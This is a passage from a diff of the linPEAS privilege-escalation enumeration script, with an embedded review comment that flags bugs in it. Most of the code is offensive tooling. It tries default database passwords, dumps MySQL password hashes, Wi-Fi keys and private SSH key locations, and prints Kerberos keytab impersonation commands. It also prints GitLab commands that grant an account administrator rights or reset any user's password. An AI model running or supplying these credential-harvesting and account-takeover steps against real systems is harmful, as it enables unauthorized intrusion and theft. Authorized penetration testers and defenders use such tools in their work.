[ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" +fi +timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) +printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi +done +#relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" +#for rp in "$relpath"; do +# echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" +#done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then +print_2title "Analyzing .socket files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done +done +if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +if ! 
[ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" +fi +echo "" + +print_2title "Unix Sockets Listening" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" +# Search sockets using netstat and ss +unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") +fi +if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) +fi + +# But also search socket files +unix_scks_list2=$(find / -type s 2>/dev/null) + +# Detele repeated dockets and check permissions +(printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. 
Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi +done +echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then +printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + + #TODO: identify 
allows in context="default" + done +done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then +busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi +done +else echo_not_found "busctl" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/software_information.sh b/linPEAS/builder/linpeas_parts/software_information.sh new file mode 100644 index 0000000..49436fd --- /dev/null +++ b/linPEAS/builder/linpeas_parts/software_information.sh 
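Review bot: In the "Unix Sockets Listening" loop (`while read l; do`), the socket probe and owner lookup read `$s` instead of the loop variable — `socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)`, `owner=$(ls -l "$s" | cut -d ' ' -f 3)` and the `echo "Socket $s owned by ..."` message — and `$s` appears not to be set at that point (the earlier `while read s` loops run in pipeline subshells), so the probe targets an empty or stale path; each should use `"$l"`. The macOS LaunchAgents fallback `program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | ...)` reads a hard-coded plist rather than `"$f"`, so every plist lacking a `Program` key is judged by MonitorHelper's arguments. The second Docker check echoes `/run/docker.sock` but its `sed` still matches `/var/run/docker.sock is writable`, so that line is never highlighted. The D-Bus policy greps appear here as `grep "" "$f"` and `grep "/dev/null | grep -v "root")`, i.e. with empty or truncated patterns that would match every line; if that is only the page stripping angle-bracket tags it is harmless, but it is worth confirming the committed patterns are intact.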
@@ -0,0 +1,553 @@ +########################################### +#--------) Software Information (---------# +########################################### + +#-- SI) Mysql version +print_2title "MySQL version" +mysql --version 2>/dev/null || echo_not_found "mysql" +echo "" + +#-- SI) Mysql connection root/root +print_list "MySQL connection using default root/root ........... " +mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/toor +print_list "MySQL connection using root/toor ................... " +mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null) +if [ "$mysqlconnect" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql connection root/NOPASS +mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null) +print_list "MySQL connection using root/NOPASS ................. " +if [ "$mysqlconnectnopass" ]; then + echo "Yes" | sed -${E} "s,.*,${SED_RED}," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +#-- SI) Mysql credentials +print_2title "Searching mysql credentials and exec" +if [ "$PSTORAGE_MYSQL" ]; then + printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do + for f in $(find $d -name debian.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the mysql debian.cnf. 
You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED}," + cat "$f" + fi + done + for f in $(find $d -name user.MYD 2>/dev/null); do + if [ -r "$f" ]; then + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED}," + grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" + fi + done + for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do + if [ -r "$f" ]; then + u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null) + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," + fi + done + for f in $(find $d -name my.cnf 2>/dev/null); do + if [ -r "$f" ]; then + echo "Found readable $f" + grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED}," + fi + done + mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so") + if [ "$mysqlexec" ]; then + echo "Found $mysqlexec" + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED}," + fi + done +else echo_not_found +fi +echo "" + +peass{MariaDB} + +peass{PostgreSQL} + +#-- SI) PostgreSQL brute +if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. +#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this + print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ " + if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ 
" + if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + + print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... " + if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED}," + else echo_no + fi + echo "" +fi + +peass{Mongo} + +peass{Apache} + +peass{Tomcat} + +peass{FastCGI} + +peass{Http_conf} + +peass{Htpasswd} + +peass{PHP Sessions} + +peass{Wordpress} + +peass{Drupal} + +peass{Moodle} + +peass{Supervisord} + +peass{Cesi} + +peass{Rsync} + +peass{Hostapd} + +#-- SI) Wifi conns +print_2title "Searching wifi conns file" +wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null) +if [ "$wifi" ]; then + printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done +else echo_not_found +fi +echo "" + +peass{Anaconda ks} + +peass{VNC} + +peass{Ldap} + +peass{OpenVPN} + +#-- SI) ssh files +print_2title "Searching ssl/ssh files" +if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi +sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" +hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" +hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" + +peass{SSH} + +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} 
"s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," + +if [ "$TIMEOUT" ]; then + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) +else + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) +fi + +if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then + echo "" + print_3title "Possible private SSH keys were found!" 
| sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" +fi +if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" + printf "$certsb4_grep\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" +fi +if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" +fi +if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" +fi +if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then + print_3title "Listing SSH Agents" + ssh-add -l + echo "" +fi +if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" +fi +if [ "$hostsdenied" ]; then + print_3title "/etc/hosts.denied file found, read the rules:" + printf "$hostsdenied\n" + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," + echo "" +fi +if [ "$hostsallow" ]; then + print_3title "/etc/hosts.allow file found, trying to read the rules:" + printf "$hostsallow\n" + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi +if [ "$sshconfig" ]; then + echo "" + echo "Searching inside /etc/ssh/ssh_config for interesting info" + grep -v "^#" 
/etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," +fi +echo "" + +#-- SI) PAM auth +print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" +pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth) +if [ "$pamssh" ]; then + grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- SI) NFS exports +print_2title "NFS exports?" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" +if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," +else echo_not_found "/etc/exports" +fi +echo "" + +#-- SI) Kerberos +print_2title "Searching kerberos conf files and tickets" +print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory" +kadmin_exists="$(command -v kadmin)" +klist_exists="$(command -v klist)" +if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi +if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi +ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)" +if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g"; +else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g"; +fi + +printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do + if [ -r "$f" ]; then + if echo "$f" | grep -q .k5login; then + echo ".k5login file (users with access to the user who has this file in his home)" + cat "$f" 2>/dev/null 
| sed -${E} "s,.*,${SED_RED},g" + elif echo "$f" | grep -q keytab; then + echo "" + echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" + printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do + if [ "$l" ] && echo "$l" | grep -q "@"; then + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" + #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid + #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that + fi + done + elif echo "$f" | grep -q krb5.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},"; + elif echo "$f" | grep -q kadm5.acl; then + ls -l "$f" + cat "$f" 2>/dev/null + elif echo "$f" | grep -q sssd.conf; then + ls -l "$f" + cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},"; + elif echo "$f" | grep -q secrets.ldb; then + echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + elif echo "$f" | grep -q .secrets.mkey; then + echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},"; + ls -l "$f" + fi + fi +done +ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos" +klist 2>/dev/null || echo_not_found "klist" +echo "" + +peass{Knockd} + +peass{Kibana} + +peass{Elasticsearch} + +##-- SI) Logstash +print_2title "Searching logstash files" +if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" 
"$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then + echo "Logstash is running as user:" + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED}," + fi + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," + done +else echo_not_found +fi +echo "" + +#-- SI) Vault-ssh +print_2title "Searching Vault-ssh files" +if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + echo "" + vault secrets list 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null +else echo_not_found "vault-ssh-helper.hcl" +fi +echo "" + +#-- SI) Cached AD Hashes +adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null) +print_2title "Searching AD cached hashes" +if [ "$adhashes" ]; then + ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null +else echo_not_found "cached hashes" +fi +echo "" + +#-- SI) Screen sessions +print_2title "Searching screen sessions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +screensess=$(screen -ls 2>/dev/null) +if [ "$screensess" ]; then + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," +else echo_not_found "screen" +fi +echo "" + +#-- SI) Tmux 
sessions +tmuxdefsess=$(tmux ls 2>/dev/null) +tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) +print_2title "Searching tmux sessions"$N +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" +if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then + printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m," +else echo_not_found "tmux" +fi +echo "" + +peass{CouchDB} + +peass{Redis} + +#-- SI) Dovecot +# Needs testing +print_2title "Searching dovecot files" +dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null) +if [ -z "$dovecotpass" ]; then + echo_not_found "dovecot credentials" +else + for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do + df=$(echo $d |cut -d ':' -f1) + dp=$(echo $d |cut -d ':' -f2-) + echo "Found possible PLAIN text creds in $df" + echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null + done +fi +echo "" + +peass{Mosquitto} + +peass{Neo4j} + +peass{Cloud Credentials} + +peass{Cloud Init} + +peass{CloudFlare} + +peass{Erlang} + +peass{GMV Auth} + +peass{IPSec} + +peass{IRSSI} + +peass{Keyring} + +peass{Filezilla} + +peass{Backup Manager} + +##-- SI) passwd files (splunk) +print_2title "Searching uncommon passwd files (splunk)" +SPLUNK_BIN="$(command -v splunk 2>/dev/null)" +if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi +printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do + if [ -f "$f" ] && ! 
[ -x "$f" ]; then + echo "passwd file: $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED}," + fi +done +echo "" + +print_2title "Analyzing kcpassword files" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword" +printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do + echo "$f" | sed -${E} "s,.*,${SED_RED}," + base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +done +echo "" + +##-- SI) Gitlab +print_2title "Searching GitLab related files" +#Check gitlab-rails +if [ "$(command -v gitlab-rails)" ]; then + echo "gitlab-rails was found. Trying to dump users..." + gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED}," + echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'" + echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'" + echo "" +fi +if [ "$(command -v gitlab-backup)" ]; then + echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'" + echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'" + echo "" +fi +#Check gitlab files +printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do + if echo $f | grep -q secrets.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" + elif echo $f | grep -q gitlab.yml; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -A 4 
"repositories:" + elif echo $f | grep -q gitlab.rb; then + echo "Found $f" | sed "s,$f,${SED_RED}," + cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED}," + fi + echo "" +done +echo "" + +peass{Github} + +peass{Svn} + +peass{PGP-GPG} + +peass{Cache Vi} + +peass{Wget} + +##-- SI) containerd installed +print_2title "Checking if containerd(ctr) is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation" +containerd=$(command -v ctr) +if [ "$containerd" ]; then + echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," + ctr image list +fi +echo "" + +##-- SI) runc installed +print_2title "Checking if runc is available" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation" +runc=$(command -v runc) +if [ "$runc" ]; then + echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," +fi +echo "" + +#-- SI) Docker +print_2title "Searching docker files (limit 70)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket" +printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do + ls -l "$f" 2>/dev/null + if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then + echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," + fi +done +echo "" + +peass{Firefox} + +peass{Chrome} + +peass{Autologin} + +#-- SI) S/Key athentication +print_2title "S/Key authentication" +if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then + printf "System supports$RED S/Key$NC authentication\n" + if ! [ -d /etc/skey/ ]; then + echo "${GREEN}S/Key authentication enabled, but has not been initialized" + elif ! 
